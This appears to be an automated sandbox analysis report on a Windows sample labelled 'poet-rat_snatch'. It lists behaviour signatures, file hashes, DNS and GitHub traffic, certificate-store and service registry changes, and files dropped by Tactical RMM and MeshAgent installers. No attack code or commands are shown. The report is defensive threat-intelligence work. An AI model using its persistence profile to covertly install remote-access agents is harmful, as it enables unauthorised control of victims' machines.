Analysis Overview
SHA256
e49f1144da14af1f79fccc8c9d310dc133b18cd543f1cbb669818f4872759680
Threat Level: Known bad
The file 2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch was found to be: Known bad.
Malicious Activity Summary
MeshAgent
Detects MeshAgent payload
Blocklisted process makes network request
Sets service image path in registry
Stops running service(s)
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Command and Scripting Interpreter: PowerShell
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Runs ping.exe
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-06 13:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-06 13:44
Reported
2024-10-06 13:46
Platform
win7-20240903-en
Max time kernel
13s
Max time network
20s
Command Line
Signatures
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabFDA2.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarFDD4.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-06 13:44
Reported
2024-10-06 13:46
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
149s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " | C:\Program Files\TacticalAgent\meshagent.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\meshagent.exe | N/A |
| N/A | N/A | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| N/A | N/A | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\ProgramData\chocolatey\choco.exe | N/A |
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\iphlpapi.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\gdi32full.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\shell32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\comctl32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dbghelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\crypt32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\win32u.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\gdi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ntasn1.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\bcryptprimitives.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\apphelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ntdll.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\DLL\kernel32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ncrypt.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ntasn1.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\kernel32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\gdiplus.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\gdi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\msvcp_win.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\shell32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\rpcrt4.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\user32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\msvcrt.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\user32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\sechost.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\bcryptprimitives.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\crypt32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\gdi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\C0BEA687D7F053491F9C106031255364DAE54685 | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ntdll.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ole32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\crypt32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ws2_32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ucrtbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\gdi32full.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\msvcrt.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\23B56D70E6D09C712A2517A44EB94CA3FFE835CA | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\combase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\combase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\apphelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\win32u.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\shell32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\MeshService64.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\kernel32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\smi\mibs\SNMPv2-SMI.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\idle\PyParse.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\setuptools\_distutils\archive_util.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32\test\test_win32print.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\server\exception.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Cipher\Blowfish.pyi | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography-42.0.8.dist-info\RECORD | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\six.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\resolvelib\structs.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\ply-3.11.dist-info\RECORD | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp_pysmi-1.1.12.dist-info\entry_points.txt | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\tools\browser.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\SelfTest\Cipher\test_Salsa20.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Util\Counter.pyi | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\pyproject.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pycryptodomex-3.20.0.dist-info\METADATA | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\cli\command_context.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\wheel_builder.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\rich\_extension.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\idle\FormatParagraph.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\sniffio\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\demos\trybag.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography\hazmat\primitives\kdf\concatkdf.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\metadata\importlib\_compat.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\rich\box.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\websockets\http.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Scripts\pip3.exe | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Util\_raw_api.pyi | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\idna\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\rich\_emoji_codes.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\psutil\tests\test_windows.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\proto\secmod\rfc3414\auth\base.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\PublicKey\_x25519.pyd | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\h11\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\truststore\py.typed | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\debugger\dbgpyapp.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pywin32.pth | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\_asyncio.pyd | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\anyio-4.4.0.dist-info\RECORD | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\metadata\importlib\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\proto\secmod\rfc7860\auth\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\mfc\window.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\setuptools\logging.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\sniffio-1.3.1.dist-info\INSTALLER | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\h11\py.typed | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\urllib3\fields.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\proto\acmod\void.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\httpcore\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\chardet\charsetprober.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\smi\mibs\PYSNMP-SOURCE-MIB.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\websockets\legacy\client.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32\Demos\win32clipboardDemo.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\api-ms-win-core-errorhandling-l1-1-0.dll | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography\hazmat\backends\openssl\aead.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
